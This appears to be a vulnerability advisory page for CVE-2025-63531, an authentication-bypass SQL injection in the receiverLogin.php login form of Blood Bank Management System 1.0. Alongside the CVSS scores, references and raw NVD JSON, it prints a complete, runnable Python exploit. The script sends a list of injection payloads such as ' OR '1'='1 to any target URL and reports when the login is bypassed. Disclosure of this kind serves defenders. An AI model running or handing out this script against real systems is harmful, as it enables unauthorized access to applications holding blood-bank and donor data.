CVE-2025-63531

Description

A SQL injection vulnerability exists in the Blood Bank Management System 1.0 within the receiverLogin.php component. The application fails to properly sanitize user-supplied input in SQL queries, allowing an attacker to inject arbitrary SQL code. By manipulating the remail and rpassword fields, an attacker can bypass authentication and gain unauthorized access to the system.

CVSS Details

CVSS Score

10.0

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:shridharshukl:blood_bank_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

Blood Bank Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-63531 SQL Injection PoC
# Target: Blood Bank Management System 1.0 - receiverLogin.php
# Author: Security Researcher

def exploit_sqli(target_url, payload):
    """
    Exploit SQL injection vulnerability in Blood Bank Management System
    """
    target = target_url.rstrip('/') + '/receiverLogin.php'
    
    # SQL injection payload for authentication bypass
    data = {
        'remail': payload,
        'rpassword': 'anypassword'
    }
    
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    
    try:
        response = requests.post(target, data=data, headers=headers, timeout=10)
        return response
    except requests.exceptions.RequestException as e:
        print(f'[-] Request failed: {e}')
        return None

def main():
    if len(sys.argv) < 2:
        print('Usage: python cve-2025-63531.py <target_url>')
        print('Example: python cve-2025-63531.py http://vulnerable-site.com')
        sys.exit(1)
    
    target_url = sys.argv[1]
    
    # Basic authentication bypass payloads
    payloads = [
        "' OR '1'='1",
        "admin' OR '1'='1'--",
        "' OR 1=1--",
        "' UNION SELECT NULL--",
        "' OR 'x'='x"
    ]
    
    print(f'[*] Targeting: {target_url}')
    print(f'[*] Exploiting CVE-2025-63531 SQL Injection...')
    
    for payload in payloads:
        print(f'[*] Testing payload: {payload}')
        response = exploit_sqli(target_url, payload)
        if response and response.status_code == 200:
            # Check for successful login indicators
            if 'dashboard' in response.text.lower() or 'welcome' in response.text.lower():
                print(f'[+] Successful exploitation with payload: {payload}')
                print(f'[+] Authentication bypassed!')
                return
    
    print('[-] Exploitation failed or target not vulnerable')

if __name__ == '__main__':
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-63531
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-63531
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-63531/
[4] VulDB https://vuldb.com/cve/CVE-2025-63531
[5] https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing
[6] https://github.com/Shridharshukl/Blood-Bank-Management-System
[7] https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63531.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-63531", "sourceIdentifier": "[email protected]", "published": "2025-12-01T15:15:51.987", "lastModified": "2025-12-02T03:03:24.593", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A SQL injection vulnerability exists in the Blood Bank Management System 1.0 within the receiverLogin.php component. The application fails to properly sanitize user-supplied input in SQL queries, allowing an attacker to inject arbitrary SQL code. By manipulating the remail and rpassword fields, an attacker can bypass authentication and gain unauthorized access to the system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:shridharshukl:blood_bank_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "5B391DFD-8072-4642-9A31-9E4DE8648367"}]}]}], "references": [{"url": "https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/Shridharshukl/Blood-Bank-Management-System", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63531.md", "source": "[email protected]", "tags": ["Exploit"]}]}}